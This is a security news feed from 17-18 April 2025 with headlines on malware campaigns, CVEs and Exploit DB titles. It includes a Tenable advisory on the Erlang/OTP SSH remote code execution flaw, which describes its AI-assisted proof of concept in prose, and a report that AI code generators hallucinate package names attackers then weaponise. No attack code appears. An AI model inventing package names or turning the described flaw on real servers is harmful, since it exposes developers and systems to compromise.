by HACKLIDO
2025-04-18 17:33:00
Multi-Stage Malware Attack Uses .JSE and PowerShell to Deploy Agent Tesla and XLoader
A new multi-stage attack has been observed delivering malware families like Agent Tesla variants, Remcos RAT, and XLoader. "Attackers increasingly rely on such complex delivery mechanisms to evade detection, bypass traditional sandboxes, and ensure successful payload delivery and execution," Palo Alto Networks Unit 42 researcher Saqib Khanzada said in a technical write-up of the campaign. The
by The Hacker News
2025-04-18 17:26:09
Chinese APT Mustang Panda Debuts 4 New Attack Tools
The notorious nation-state-backed threat actor has added two new keyloggers, a lateral movement tool, and an endpoint detection and response (EDR) evasion driver to its arsenal.
by Dark Reading
2025-04-18 16:58:12
That Google email look real? Don't click - it might be scam. Here's how to tell
Until Google rolls out a fix, you'll have to be on the lookout for this particularly convincing phishing scam.
by ZDNET Security
2025-04-18 16:39:51
Cyberhaven Supply Chain Attack: Exploiting Browser Extensions
In late 2024, Darktrace detected unusual activity linked to Cyberhaven's Chrome browser extension. Read more about Darktrace's investigation here.
by Darktrace
2025-04-18 16:36:41
Detecting and Containing Account Takeover with Darktrace
Account takeovers are rising with SaaS adoption. Learn how Darktrace detects deviations in user behavior and autonomously stops threats before they escalate.
by Darktrace
2025-04-18 16:35:08
Email bombing exposed: Darktrace's email defense in action
An email bomb attack floods inboxes with a large volume of emails to disrupt operations and conceal suspicious activity, often bypassing traditional security tools. Darktrace detected such an attack in early 2025, identifying unusual email patterns and subsequent network anomalies.
by Darktrace
2025-04-18 16:32:51
Alleged SmokeLoader malware operator facing federal charges in Vermont
An alleged operator of the SmokeLoader malware is now facing federal hacking charges in Vermont after accusations that he stole personal information on more than 65,000 people.
by The Record
2025-04-18 16:30:24
Darktrace Releases Annual 2024 Threat Insights
Explore Darktrace's Annual Threat Report 2024 for insights on the latest cyber threats and trends observed throughout the year.
by Darktrace
2025-04-18 16:24:49
The Shadow AI Surge: Study Finds 50% of Workers Use Unapproved AI Tools
With unapproved AI tools entrenched in daily workflows, experts say it's time to shift from monitoring to managing Shadow AI use across the enterprise.
by SecurityWeek
2025-04-18 16:00:00
Russia's Pravda network in numbers: Introducing the Pravda Dashboard
The Pravda Dashboard reveals how Russia's global network circumvents sanctions on prohibited content.
by DFRLab
2025-04-18 15:48:57
Text scams grow to steal hundreds of millions of dollars
Text scams come in many forms and are an ever-increasing threat doing an awful lot of financial, and other, damage.
by Malwarebytes Labs
2025-04-18 15:45:53
Reddit Says U.S. Top Requester of User Account Data
Reddit disclosed that the United States remained the largest source of legal demands for account information in the second half of 2024, accounting for nearly two-thirds of all global government and law enforcement requests. The company revealed these details in its latest transparency report, highlighting a notable increase in both the volume and rate of …
by Cyber Insider
2025-04-18 15:24:58
CISA Weighs In on Alleged Oracle Cloud Breach
The agency is recommending that organizations and individuals implement its recommendations to prevent the misuse of stolen data, though Oracle has yet to publicly do the same for its customers.
by Dark Reading
2025-04-18 15:15:00
[Webinar] AI Is Already Inside Your SaaS Stack — Learn How to Prevent the Next Silent Breach
Your employees didn't mean to expose sensitive data. They just wanted to move faster. So they used ChatGPT to summarize a deal. Uploaded a spreadsheet to an AI-enhanced tool. Integrated a chatbot into Salesforce. No big deal, until it is. If this sounds familiar, you're not alone. Most security teams are already behind in detecting how AI tools are quietly reshaping their SaaS environments. And
by The Hacker News
2025-04-18 15:13:45
ICE Is Paying Palantir $30 Million to Build 'ImmigrationOS' Surveillance Platform
In a document published Thursday, ICE explained the functions that it expects Palantir to include in a prototype of a new program to give the agency "near real-time" data about people self-deporting.
by WIRED Security News
2025-04-18 14:40:00
How do cybercriminals steal credit card information?
Cybercriminals have various methods at their disposal to hack and exploit credit card information. Learn what they are, how to prevent them and what to do when hacked.
by ComputerWeekly
2025-04-18 14:00:00
If Boards Don't Fix OT Security, Regulators Will
Around the world, governments are setting higher-bar regulations with clear corporate accountability for breaches on the belief organizations won't drive up security maturity for operational technology unless they're made to.
by Dark Reading
2025-04-18 13:57:05
The Zoom attack you didn't see coming
Did you know that when participating in a Zoom call, you can grant permission to other participants to control your computer remotely? While this feature may come in handy when dealing with trusted family, friends and colleagues, threat actors have started abusing it to install malware on targets' computers. The Zoom remote control attack: this specific tactic has been leveraged by an individual or group that The Security Alliance (SEAL), a nonprofit dedicated to …
by Help Net Security
2025-04-18 13:44:40
Interlock ransomware gang pushes fake IT tools in ClickFix attacks
The Interlock ransomware gang now uses ClickFix attacks that impersonate IT tools to breach corporate networks and deploy file-encrypting malware on devices. [...]
by BleepingComputer
2025-04-18 13:05:39
OpenAI details ChatGPT-o3, o4-mini, o4-mini-high usage limits
OpenAI has launched three new reasoning models - o3, o4-mini, and o4-mini-high - for Plus and Pro subscribers, but as it turns out, these models do not offer 'unlimited' usage. [...]
by BleepingComputer
2025-04-18 13:01:45
Apple Zero-Days Under 'Sophisticated Attack,' but Details Lacking
The technology giant said two zero-day vulnerabilities were used in attacks on iOS devices against "specific targeted individuals," which suggests spyware or nation-state threat activity.
by Dark Reading
2025-04-18 13:00:45
More From Our Main Blog: The Good, the Bad and the Ugly in Cybersecurity – Week 16
CISA funds near-expired CVE program, attackers leverage Gamma AI to phish Microsoft users, and Mustang Panda deploys new toolkit to target Myanmar.
by SentinelOne
2025-04-18 12:40:00
Experts Uncover New XorDDoS Controller, Infrastructure as Malware Expands to Docker, Linux, IoT
Cybersecurity researchers are warning of continued risks posed by a distributed denial-of-service (DDoS) malware known as XorDDoS, with 71.3 percent of the attacks between November 2023 and February 2025 targeting the United States. "From 2020 to 2023, the XorDDoS trojan has increased significantly in prevalence," Cisco Talos researcher Joey Chen said in a Thursday analysis.
by The Hacker News
2025-04-18 12:19:47
FBI: Scammers pose as FBI IC3 employees to 'help' recover lost funds
The FBI warns that scammers posing as FBI IC3 employees are offering to "help" fraud victims recover money lost to other scammers. [...]
by BleepingComputer
2025-04-18 12:05:23
ASUS warns of critical auth bypass flaw in routers using AiCloud
ASUS is warning about an authentication bypass vulnerability in routers with AiCloud enabled that could allow remote attackers to perform unauthorized execution of functions on the device. [...]
by BleepingComputer
2025-04-18 11:35:33
Sonicwall SMA100 vulnerability exploited by attackers (CVE-2021-20035)
CVE-2021-20035, an old vulnerability affecting Sonicwall Secure Mobile Access (SMA) 100 series appliances, is being exploited by attackers. Sonicwall confirmed it by updating the original security advisory to reflect the new state of play, and by changing the description of the vulnerability to say that it can potentially lead to code execution, instead of only to denial of service (DoS). About CVE-2021-20035: Sonicwall SMA 100 series appliances provide a unified secure access gateway optimized for small …
by Help Net Security
2025-04-18 11:30:00
In Other News: 4chan Hacked, Android Auto-Reboot, Nemesis Admin Charged
Noteworthy stories that might have slipped under the radar: 4chan hacked, auto-reboot security feature coming to Android, Iranian administrator of Nemesis charged in US.
by SecurityWeek
2025-04-18 11:22:15
CVE-2025-32433: Erlang/OTP SSH Unauthenticated Remote Code Execution Vulnerability
Proof-of-concept code has been released after researchers disclosed a maximum severity remote code execution vulnerability in Erlang/OTP SSH. Successful exploitation could allow for complete takeover of affected devices.

Background
On April 16, Fabian Bäumer, Marcus Brinkmann, Marcel Maehren, and Jörg Schwenk of the Ruhr University Bochum in Germany disclosed a critical vulnerability in Erlang/OTP SSH to the OpenWall vulnerability mailing list. Additionally, an official advisory was posted to the GitHub project for Erlang/OTP crediting the researchers for their disclosure.

CVE             Description                                          CVSSv3   VPR
CVE-2025-32433  Erlang/OTP SSH Remote Code Execution Vulnerability   10.0     10*

*Please note: Tenable's Vulnerability Priority Rating (VPR) scores are calculated nightly. This blog post was published on April 18 and reflects VPR at that time.

Analysis
CVE-2025-32433 is a remote code execution (RCE) vulnerability affecting the Erlang/OTP SSH server. It exists due to a flaw in SSH protocol message handling that could allow an unauthenticated attacker to execute arbitrary code. According to the advisory, all users running Erlang/OTP SSH servers are impacted, and you should assume impact if your application uses the Erlang/OTP SSH library. The vulnerability received the maximum CVSSv3 score of 10.0 and, when the SSH daemon runs as root, allows an attacker to completely compromise an affected device.
At the time this blog was published, no known exploitation had been observed; however, given the ease of exploitation and the critical severity, we anticipate attacks will occur soon.

Proof of concept
On April 17, researchers at Platform Security released a public proof-of-concept (PoC) exploit for CVE-2025-32433. The write-up notes that the PoC was generated with the help of ChatGPT and Cursor, and that it was fairly simple to do so using those AI tools.
The PoC initiates an SSH protocol negotiation as a normal client would. But before authenticating the user, the client sends an unexpected message containing an arbitrary command. A vulnerable server processes these messages and executes the command; a patched server disconnects immediately upon seeing such messages prior to authentication.
An additional PoC has been released, and the Horizon3 Attack Team posted on X (formerly Twitter) that they had developed a PoC but had chosen not to release it as of writing:

"Just finished reproducing CVE-2025-32433 and putting together a quick PoC exploit — surprisingly easy. Wouldn't be shocked if public PoCs start dropping soon. If you're tracking this, now's the time to take action. #Erlang #SSH pic.twitter.com/hBqJMfFHMN" — Horizon3 Attack Team (@Horizon3Attack) April 17, 2025

Solution
Erlang/OTP has released patches to address this vulnerability.

Affected Versions          Fixed Versions
OTP-27.3.2 and below       OTP-27.3.3
OTP-26.2.5.10 and below    OTP-26.2.5.11
OTP-25.3.2.19 and below    OTP-25.3.2.20

If immediate patching cannot be performed, restricting access via a firewall or disabling the SSH server are mitigation steps provided by Erlang/OTP. However, we strongly recommend upgrading as soon as possible to fully remediate this vulnerability.

Identifying affected systems
A list of Tenable plugins for this vulnerability can be found on the individual CVE page for CVE-2025-32433 as they're released. This link will display all available plugins for this vulnerability, including upcoming plugins in our Plugins Pipeline. Additionally, customers can utilize Tenable Attack Surface Management to identify hosts running Erlang/OTP SSH Server.

Get more information
Openwall mailing list announcement for CVE-2025-32433
Advisory for CVE-2025-32433
Join Tenable's Security Response Team on the Tenable Community.
Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.
by Tenable
2025-04-18 11:19:58
U.S. CISA adds Apple products and Microsoft Windows NTLM flaws to its Known Exploited Vulnerabilities catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Apple products and Microsoft Windows NTLM vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions of the flaws: This week Apple released out-of-band […]
by Security Affairs
2025-04-18 11:16:32
Understanding CMMC and Its Impact on Cybersecurity
This post first appeared on blog.netwrix.com and was written by Dirk Schrader.
What Is CMMC? The Cybersecurity Maturity Model Certification (CMMC) is a framework designed by the US Department of Defense (DoD) to enhance the cybersecurity posture of companies within the Defense Industrial Base (DIB). It establishes security requirements that contractors must meet to protect Controlled Unclassified Information (CUI) and Federal Contract Information (FCI) from cyber threats. … Continued
by Netwrix
2025-04-18 11:12:00
Lemonade says applicant driver's license numbers exposed
The company is notifying about 190,000 people after certain information used for car insurance quotes was left unencrypted.
by Cybersecurity Dive
2025-04-18 11:02:08
SonicWall SMA VPN devices targeted in attacks since January
A remote code execution vulnerability affecting SonicWall Secure Mobile Access (SMA) appliances has been under active exploitation since at least January 2025, according to cybersecurity company Arctic Wolf. [...]
by BleepingComputer
2025-04-18 11:00:00
Cy4Data Labs Raises $10 Million to Secure Data in Use
Data protection firm Cy4Data Labs has raised $10 million in a Series A funding round led by Pelion Venture Partners.
by SecurityWeek
2025-04-18 10:45:01
Critical Authentication Flaw in ASUS AiCloud Exposes Routers to Remote Attacks
A critical vulnerability tracked as CVE-2025-2492 has been disclosed in ASUS routers running AiCloud, potentially allowing remote attackers to execute unauthorized functions without authentication. The flaw, rated 9.2 (Critical) under the CVSS 4.0 system, affects multiple firmware versions and underscores the continued risk posed by exposed cloud-enabled features in consumer networking devices. The vulnerability was …
by Cyber Insider
2025-04-18 10:09:16
Mozilla Fears Firefox Fallout from Google Search Antitrust Case
Ahead of a key hearing in the U.S. government's antitrust case against Google, Mozilla CEO Laura Chambers has warned that some proposed remedies could unintentionally damage Firefox and the broader ecosystem of independent browsers. The hearing, scheduled for April 21, 2025, follows the DOJ's 2020 lawsuit accusing Google of illegally maintaining its monopoly in the …
by Cyber Insider
2025-04-18 09:59:00
CVE-2025-24054 Under Active Attack—Steals NTLM Credentials on File Download
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a medium-severity security flaw impacting Microsoft Windows to its Known Exploited Vulnerabilities (KEV) catalog, following reports of active exploitation in the wild. The vulnerability, assigned the CVE identifier CVE-2025-24054 (CVSS score: 6.5), is a Windows New Technology LAN Manager (NTLM) hash disclosure
by The Hacker News
2025-04-18 09:40:25
Microsoft Sets October 2025 Deadline to Replace Office 2016 and 2019
Microsoft has announced that support for Office 2016 and Office 2019 will officially end on October 14, 2025, prompting organizations to begin planning their migration to Microsoft 365 Apps. The company emphasizes that continuing to use these legacy versions after the deadline could result in missing critical security updates and experiencing connectivity issues with Microsoft …
by Cyber Insider
2025-04-18 09:05:00
Patch Now: NVIDIA Flaws Expose AI Models, Critical Infrastructure
A fix for a critical flaw in a tool allowing organizations to run GPU-accelerated containers released last year did not fully mitigate the issue, spurring the need to patch a secondary flaw to protect organizations that rely on NVIDIA processors for AI workloads.
by ITPro Today
2025-04-18 09:00:00
Cloud vs. Cloud-Native Applications: What's the Difference?
Not all cloud-based apps are cloud-native and vice versa. This guide unpacks the architectural, operational, and strategic distinctions to help IT teams make the right deployment choices.
by ITPro Today
2025-04-18 09:00:00
Cybersecurity Snapshot: NIST Aligns Its Privacy and Cyber Frameworks, While Researchers Warn About Hallucination Risks from GenAI Code Generators
Check out NIST’s effort to further mesh its privacy and cyber frameworks. Plus, learn why code-writing GenAI tools can put developers at risk of package-confusion attacks. Also, find out what Tenable webinar attendees said about identity security. And get the latest on the MITRE CVE program and on attacks against edge routers.

Dive into five things that are top of mind for the week ending April 18.

1 - NIST updates Privacy Framework, tailoring it to the Cybersecurity Framework and adding an AI section

Recognizing that data protection and cyberattack prevention overlap and are deeply intertwined, the U.S. government is aligning two foundational privacy and cybersecurity frameworks.

This week, the U.S. National Institute of Standards and Technology (NIST) released a draft update of its Privacy Framework (PFW) that more closely interconnects it with the popular Cybersecurity Framework (CSF), which was updated in 2024.

Although the PFW can be used on its own, this updated version makes its use with the CSF “seamless” so that organizations can leverage the two frameworks “to manage the full spectrum of privacy and cybersecurity risks,” Julie Chua, Director of NIST’s Applied Cybersecurity Division, said in a statement.

Both frameworks have a “Core” section, which outlines detailed activities and outcomes aimed at helping organizations discuss risk management. “The PFW 1.1 Public Draft Core is realigned with the CSF 2.0 Core in many places, making life easier on users,” NIST said in the statement.

The “NIST Privacy Framework 1.1 Initial Public Draft” also adds a new section about the risks to data privacy from artificial intelligence. Specifically, organizations can use it to “ensure that organizational privacy values are reflected in the development and use of AI systems,” the PFW draft reads.

NIST first published the PFW in 2020, with the goal of helping organizations mitigate the privacy risks associated with the processing of personal data in their computer systems. It outlines five core functions:
- Identify, which includes inventorying the organization’s data-processing scenarios and conducting privacy risk assessments
- Govern, which involves the creation and adoption of the organization’s governance structure for data privacy
- Control, which addresses the organization’s development and implementation of appropriate data-management activities
- Communicate, which includes sharing publicly how the organization processes personal data and manages privacy risks
- Protect, which touches on the organization’s data security processes aimed at preventing cyber breaches

The PFW 1.1 draft is open for public comment until June 13, 2025. NIST plans to publish a final version later this year.

For more information about data privacy and data security, check out these Tenable resources:
- “What Makes This “Data Privacy Day” Different?” (blog)
- “Know Your Exposure: Is Your Cloud Data Secure in the Age of AI?” (on-demand webinar)
- “Harden Your Cloud Security Posture by Protecting Your Cloud Data and AI Resources” (blog)
- “The Data-Factor: Why Integrating DSPM Is Key to Your CNAPP Strategy” (blog)
- “Data Security in Healthcare: How Tenable Cloud Security Can Help” (blog)

2 - GenAI code-generation hallucinations open the door for package-confusion attacks

Here’s a warning for developers who use generative AI to write code: Generative AI tools may prompt you to download software packages that are infected with malware.

That’s the main finding from the study “We Have a Package for You! A Comprehensive Analysis of Package Hallucinations by Code Generating LLMs” by researchers from the University of Texas at San Antonio, the University of Oklahoma and Virginia Tech.

How can this happen? When prompted to write code, generative AI tools powered by large language models (LLMs) often suggest that developers download software packages from public repositories. However, in many cases, the software packages the generative AI tools mention don’t exist. The tools invent names for non-existent software packages and falsely say the packages are located in specific software repositories.

The best-case scenario is that the developer goes looking for the imagined software package and doesn’t find it. Unfortunately, cyberattackers are taking note. They’re baptizing their malicious packages with the made-up names and storing them in repositories, hoping developers will inadvertently download them thinking they’re legit.

“These hallucinations, which arise from fact-conflicting errors when generating code using LLMs, represent a novel form of package confusion attack that poses a critical threat to the integrity of the software supply chain,” the researchers wrote.

The researchers generated 576,000 code samples in Python and JavaScript using 16 generative AI tools and two unique prompt datasets. Here are some key findings:
- The incidence of package hallucination was an average of 5.2% for commercial tools and 21.7% for open-source tools.
- The tools generated about 205,000 unique hallucinated package names.

“Our experiments and findings highlight package hallucinations as a persistent and systemic phenomenon while using state-of-the-art LLMs for code generation, and a significant challenge which deserves the research community’s urgent attention,” the researchers wrote.

The researchers also tested several mitigation techniques that helped reduce the incidence of software-package hallucinations, including retrieval augmented generation, self refinement and fine tuning.

For more information about AI security and the risks of using generative AI for writing code:
- “Cybersecurity Risks of AI-Generated Code” (Georgetown University)
- “AI-generated code risks: What CISOs need to know” (ITPro)
- “The risks of AI-generated code are real — here’s how enterprises can manage the risk” (Venturebeat)
- “Gen AI could speed up coding, but businesses should still consider risks” (ZDNet)
- “AI coding agents come with legal risk” (CIO)

3 - Tenable polls webinar attendees on identity security

During our recent webinar “Three Reasons Why It's Time to Embrace Identity as Part of Exposure Management,” we polled attendees about identity security topics, such as their ability to correlate identity incidents with broader attack paths. Check out what they said.

(Poll chart: 119 webinar attendees polled by Tenable, March 2025)
(Poll chart: 110 webinar attendees polled by Tenable, March 2025)
(Poll chart: 144 webinar attendees polled by Tenable, March 2025)

Check out this on-demand webinar to learn how you can adopt a more proactive identity security strategy as part of your exposure management program.

4 - Canada’s cyber agency warns about spike in router hacking

Nation-state attackers associated with China’s government, including the cyber espionage group Salt Typhoon, are ramping up attacks on network edge routers of critical infrastructure organizations.

The Canadian Centre for Cyber Security issued the warning this week via an advisory titled “People’s Republic of China activity targeting network edge routers: Observations and mitigation strategies,” which details the threat and offers mitigation recommendations.

Compromised network edge routers can allow attackers to breach a network and then monitor, modify, and exfiltrate network traffic, and even move deeper into the victim’s network, according to the advisory.

A key insight: The attackers are feasting on low-hanging fruit -- misconfigured and unpatched routing devices. The best and simplest prevention? Patch these products as soon as possible.

“Threat actors often compromise network perimeter defenses by exploiting known vulnerabilities in edge devices. These security weaknesses are usually already identified, and patches are available to fix them. However, breaches occur because these patches are not consistently applied or implemented in a timely manner,” the advisory reads.

The Cyber Centre has also observed router compromises stemming from basic security mistakes, such as the use of default and weak passwords, and of default security settings.

Other mitigation recommendations include:
- Disable unnecessary network edge services, especially unsecured ones such as HTTP.
- Remove direct internet access to device management interfaces, restricting admins to internal and secure management networks.
- Protect all administrative access with phishing-resistant multi-factor authentication.
- Use modern encryption standards.
- Keep firmware updated.
- Adopt secure, centralized logging, encrypt logging traffic and store logs offsite.

For more information about Salt Typhoon:
- “Salt Typhoon: An Analysis of Vulnerabilities Exploited by this State-Sponsored Actor” (Tenable)
- “China’s Salt Typhoon Spies Are Still Hacking Telecoms—Now by Exploiting Cisco Routers” (Wired)
- “New CISA Hardening Guidance Provides Valuable Insights for Network Security Engineers” (Tenable)
- “What Should the US Do About Salt Typhoon?” (Dark Reading)
- “What is Salt Typhoon? A security expert explains the Chinese hackers and their attack on US telecommunications networks” (The Conversation)

5 - CVE program renewed for one year, but questions about its future linger

A collective gasp was heard around the cybersecurity world on Tuesday, when news broke that the MITRE Common Vulnerabilities and Exposures (CVE) program might be in imminent danger of shutting down.

Fortunately, this scenario didn’t materialize, after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) came to the rescue and extended the program’s funding for one year just as it was set to expire.

Naturally, concerns remain about the MITRE CVE program and the critical services it provides, given the close call it experienced and the limited one-year extension it obtained.

Speaking to The Wall Street Journal, Tenable Chief Security Officer and Head of Research Bob Huber said efforts to reform the CVE program will likely yield a public-private partnership of some sort. “Most of the companies that operate in this place are well-known amongst each other, as are the people responsible for those programs. I think there’s an opportunity here to improve that partnership and spread the responsibility,” Huber told the Journal.

As of the end of 2024, the CVE program had published more than 250,000 CVEs. Launched in 1999, the CVE program provides a foundational, common taxonomy for tracking vulnerabilities and exposures.

To get all the details and insights about this issue, check out these two Tenable blogs:
- “MITRE CVE Program Funding Extended For One Year”
- “Frequently Asked Questions About the MITRE CVE Program Expiration and Renewal”
by Tenable
2025-04-18 08:40:00
Why Risk Management Is Key to Sustainable Business Growth
The 2023 collapse of major U.S. banks underscores how weak risk management can trigger economic turmoil — and why a data-driven, tech-enabled risk strategy is essential for long-term stability and growth.
by ITPro Today
2025-04-18 07:33:23
PKWARE Quantum Readiness Assessment secures data from quantum computing threats
PKWARE announced its quantum readiness assessment and encryption capabilities to help organizations protect sensitive data from quantum computing threats. Quantum computing is no longer theoretical—it is becoming a powerful reality with the potential to disrupt current encryption standards. As quantum machines become capable of breaking traditional encryption methods like RSA and ECC, organizations must act now to secure their data for the future. PKWARE simplifies what could be a complex transition to post-quantum cryptography with proven …
by Help Net Security
2025-04-18 07:20:18
Entertainment venue management firm Legends International disclosed a data breach
Legends International disclosed a data breach from November 2024 that affected employees and visitors to its managed venues. Legends International is a global leader in sports and entertainment venue management, specializing in delivering comprehensive solutions for stadiums, arenas, and attractions. The company offers a 360-degree service platform that includes strategic planning, sales, partnerships, hospitality, merchandise, […]
by Security Affairs
2025-04-18 06:00:46
The UK’s phone theft crisis is a wake-up call for digital security
Phone theft is now commonplace in London. The Met Police recently revealed that it seizes 1,000 stolen phones weekly as it cracks down on organized criminal networks driving the £50 million trade. Nationally, cases have doubled to 83,900 annually. The real issue, though, isn’t the loss of the phone – it’s what happens next. Thieves are after the valuable digital assets inside the phone. With the proper access, a stolen phone becomes an all-access pass …
by Help Net Security
2025-04-18 00:00:00
[webapps] KiviCare Clinic & Patient Management System (EHR) 3.6.4 - Unauthenticated SQL Injection
by Exploit DB
2025-04-18 00:00:00
[webapps] UJCMS 9.6.3 - User Enumeration via IDOR
by Exploit DB
2025-04-18 00:00:00
[webapps] Inventio Lite 4 - SQL Injection
by Exploit DB
2025-04-18 00:00:00
[remote] Langflow 1.3.0 - Remote Code Execution (RCE)
by Exploit DB
2025-04-18 00:00:00
[webapps] Apache Commons Text 1.10.0 - Remote Code Execution
by Exploit DB
2025-04-18 00:00:00
[webapps] Tatsu 3.3.11 - Unauthenticated RCE
by Exploit DB
2025-04-18 00:00:00
[webapps] Hunk Companion Plugin 1.9.0 - Unauthenticated Plugin Installation
by Exploit DB
2025-04-18 00:00:00
When vulnerability information flows are vulnerable themselves
The recent uncertainty around MITRE's CVE database highlights a major risk in relying on a single intel source. Learn why diversified, multi-source vulnerability intelligence is crucial for cyber resilience.
by Recorded Future
2025-04-17 21:16:45
CISA Urges Action on Potential Oracle Cloud Credential Compromise
Following reports of unauthorized access to a legacy Oracle cloud environment, CISA warns of potential credential compromise leading…
by Hackread
2025-04-17 20:57:00
Moving CVEs past one-nation control
A near-miss episode of attempted defunding spotlights a need for a better way
by Sophos News
2025-04-17 20:52:00
Mustang Panda Targets Myanmar With StarProxy, EDR Bypass, and TONESHELL Updates
The China-linked threat actor known as Mustang Panda has been attributed to a cyber attack targeting an unspecified organization in Myanmar with previously unreported tooling, highlighting continued effort by the threat actors to increase the sophistication and effectiveness of their malware. This includes updated versions of a known backdoor called TONESHELL, as well as a new lateral movement
by The Hacker News
2025-04-17 20:32:24
[Scary] A New Real Cash Scam Sweeps Across the U.S. Warn Your Family and Friends!
Right now, today, thousands of people are being tricked into going to their banks or credit unions to withdraw large sums of cash and will give or send it to a complete stranger, never to see it again. Many of the victims are in the prime of their lives, intelligent, and consider themselves to be of above-average ability in spotting scams and scammers.
by KnowBe4
2025-04-17 19:56:46
Android Phones Pre-Downloaded With Malware Target User Crypto Wallets
The threat actors lace pre-downloaded applications with malware to steal cryptocurrency by covertly swapping users' wallet addresses with their own.
by Dark Reading
2025-04-17 19:30:42
China-linked APT Mustang Panda upgrades tools in its arsenal
China-linked APT group Mustang Panda deployed a new custom backdoor, MQsTTang, in recent attacks targeting Europe, Asia, and Australia. China-linked APT group Mustang Panda (aka Camaro Dragon, RedDelta or Bronze President) deployed a new custom backdoor, tracked as MQsTTang, in recent attacks targeting entities in Europe, Asia, and Australia. Mustang Panda has been active since […]
by Security Affairs
2025-04-17 19:12:55
Dogged by Trump, Chris Krebs Resigns From SentinelOne
The president revoked the former CISA director's security clearance, half a decade after Krebs challenged right-wing election disinformation, prompting his eventual resignation.
by Dark Reading
2025-04-17 18:16:57
Global Telecom Networks Host Hidden Chinese Surveillance Nodes
A new report from iVerify has revealed a far-reaching global surveillance threat enabled by China’s state-owned telecom interconnect providers. By exploiting outdated mobile signaling protocols, entities such as China Mobile International (CMI) and China Telecom Global have gained alarming access to sensitive mobile communications worldwide, with implications ranging from mass user profiling to covert malware …
by Cyber Insider
2025-04-17 18:14:38
Researchers Find CVSS 10.0 Severity RCE Vulnerability in Erlang/OTP SSH
Security researchers report CVE-2025-32433, a CVSS 10.0 RCE vulnerability in Erlang/OTP SSH, allowing unauthenticated code execution on exposed…
by Hackread
2025-04-17 18:10:49
PromptArmor Launches to Help Assess, Monitor Third-Party AI Risks
The AI security startup has already made waves with critical vulnerability discoveries and seeks to address emerging AI concerns with its PromptArmor platform.
by Dark Reading
2025-04-17 18:01:02
Care what you share
In this week’s newsletter, Thorsten muses on how search engines and AI quietly gather your data while trying to influence your buying choices. Explore privacy-friendly alternatives and get the scoop on why it's important to question the platforms you interact with online.
by Cisco Talos Blog
2025-04-17 17:37:19
Lack of Security Awareness Tops List of Obstacles to Cyber Defense
Most organizations cite low security awareness among employees as the biggest barrier to defending against cyberattacks, according to a new survey by CyberEdge Group.
by KnowBe4
2025-04-17 17:36:59
The Continued Abuse of Legitimate Domains: A Spike in the Exploitation of Google Drive to Send Phishing Attacks
First QuickBooks, then Microsoft, and now Google—will the hijacking of legitimate third-party platform communications stop escalating in 2025? Our Threat Labs researchers predict the answer is no.
by KnowBe4
2025-04-17 17:02:02
Florida draft law mandating encryption backdoors for social media accounts billed ‘dangerous and dumb’
A digital rights group blasted the Florida bill, but lawmakers voted to advance the draft law.
by TechCrunch
2025-04-17 17:02:00
State-Sponsored Hackers Weaponize ClickFix Tactic in Targeted Malware Campaigns
Multiple state-sponsored hacking groups from Iran, North Korea, and Russia have been found leveraging the increasingly popular ClickFix social engineering tactic to deploy malware over a three-month period from late 2024 through the beginning of 2025. The phishing campaigns adopting the strategy have been attributed to clusters tracked as TA427 (aka Kimsuky), TA450 (aka MuddyWater),
by The Hacker News
2025-04-17 16:56:00
Artificial Intelligence – What's all the fuss?
Talking about AI: Definitions
Artificial Intelligence (AI) — AI refers to the simulation of human intelligence in machines, enabling them to perform tasks that typically require human intelligence, such as decision-making and problem-solving. AI is the broadest concept in this field, encompassing various technologies and methodologies, including Machine Learning (ML) and Deep Learning. Machine
by The Hacker News
2025-04-17 16:52:18
New “VIP” XorDDoS Malware Targets U.S. in Global Botnet Expansion
A newly upgraded version of a long-running malware strain called XorDDoS is being used to launch powerful distributed denial-of-service (DDoS) attacks, with the United States emerging as the primary target. According to new research from Cisco Talos, over 70% of attempted attacks using the XorDDoS malware between late 2023 and early 2025 were aimed at …
by Cyber Insider
2025-04-17 16:40:53
Navigating the API release cycle
APIs are the backbone of modern software architecture, enabling seamless integration and innovation. However, a successful API doesn't just appear overnight.
by Barracuda
2025-04-17 16:31:34
Ahold Delhaize confirms data stolen after threat group claims credit for November attack
A highly active threat group says it will release stolen information, months after an attack disrupted e-commerce operations at the grocer’s U.S. business.
by Cybersecurity Dive
2025-04-17 16:30:32
How Legit Is Using Classic Economic Tools to Prevent Application Vulnerabilities
Learn more about how Legit is helping enterprises prevent vulnerabilities in their SDLCs.
by Legit Security
2025-04-17 16:29:15
What to Look for in Application Security Posture Management (ASPM)
Get details on the key capabilities for an ASPM platform.
by Legit Security
2025-04-17 16:19:44
Entrust Announces all-in-one Cryptographic Security Platform
Entrust has announced the Entrust Cryptographic Security Platform, for release in May. The platform is a unified, end-to-end cryptographic security management solution for keys, secrets, and certificates. Cyberattacks on data security and identity systems are exploding in scale and sophistication. Traditional approaches to securing data and identities aren’t working, and in digital-first environments every connected […]
by IT Security Guru
2025-04-17 16:13:45
ISACA and Chartered IIA pen open letter to UK Government urging swift audit reform to build digital resilience
ISACA and the Chartered Institute of Internal Auditors (Chartered IIA) have sent a letter to Rt Hon Jonathan Reynolds MP, Secretary of State for Business and Trade, stressing the urgent need for audit reform legislation to boost digital resilience. The letter underlines strong stakeholder support for the Audit Reform and Corporate Governance Bill promised in […]
by IT Security Guru
2025-04-17 16:02:00
Critical Erlang/OTP SSH Vulnerability (CVSS 10.0) Allows Unauthenticated Code Execution
A critical security vulnerability has been disclosed in the Erlang/Open Telecom Platform (OTP) SSH implementation that could permit an attacker to execute arbitrary code sans any authentication under certain conditions. The vulnerability, tracked as CVE-2025-32433, has been given the maximum CVSS score of 10.0. "The vulnerability allows an attacker with network access to an Erlang/OTP SSH server
by The Hacker News
2025-04-17 16:00:00
Blockchain Offers Security Benefits – But Don't Neglect Your Passwords
Blockchain is best known for its use in cryptocurrencies like Bitcoin, but it also holds significant applications for online authentication. As businesses in varying sectors increasingly embrace blockchain-based security tools, could the technology one day replace passwords?
How blockchain works
Blockchain is a secure way to maintain, encrypt, and exchange digital records of transactions.
by The Hacker News
2025-04-17 15:59:30
Apple patches security vulnerabilities in iOS and iPadOS. Update now!
Apple has released a security update for iOS and iPadOS to patch two zero-day vulnerabilities which are reported to already have been exploited...
by Malwarebytes Labs
2025-04-17 15:38:04
CVE Program Cuts Send the Cyber Sector Into Panic Mode
